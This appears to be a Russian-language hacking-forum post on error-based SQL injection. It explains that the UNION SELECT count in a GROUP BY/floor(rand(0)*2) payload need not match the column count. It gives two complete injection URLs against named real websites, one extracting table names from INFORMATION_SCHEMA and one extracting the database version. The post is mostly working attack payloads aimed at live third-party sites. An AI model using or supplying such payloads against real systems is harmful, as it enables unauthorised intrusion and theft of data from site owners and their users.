Кстати, фигня такая, типо мелочь, вот этих
union+select+2
не обязательно должно соответствовать кол-ву колонок, главное чтобы их было
=> чем надо,
причем > тут имеет ключевое значение, как оказалось в данном конкретном примере. Т.е. в итоге получается необязательно подбирать точное кол-во, жесть.
т.е. ссылка выше выдаст тоже самое, что и такой вот запрос:
Код:
http://www.gemreplica.com/about.php?cid=(select*from(select+count(*)from(select+1+union+select+2+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3)x+group+by+concat(mid((select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+limit+0,1),1,64),floor(rand(0)*2)))z)
И, что примечательно, это так и есть, и в итоге является наиболее крутым методом при проведении такого рода sql-injection, т.к. не требует ни
точного подбора
кол-ва столбцов, ни знания
названия вообще какой-либо
таблицы:
Код:
http://mihadmin.ru/statpage.php?sid=love'+and+(select*from(select+count(*)from(select+1+union+select+2+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3)x+group+by+concat(mid((select+version()+limit+0,1),1,64),floor(rand(0)*2)))z)--+
union+select+3 проставлено просто от балды
много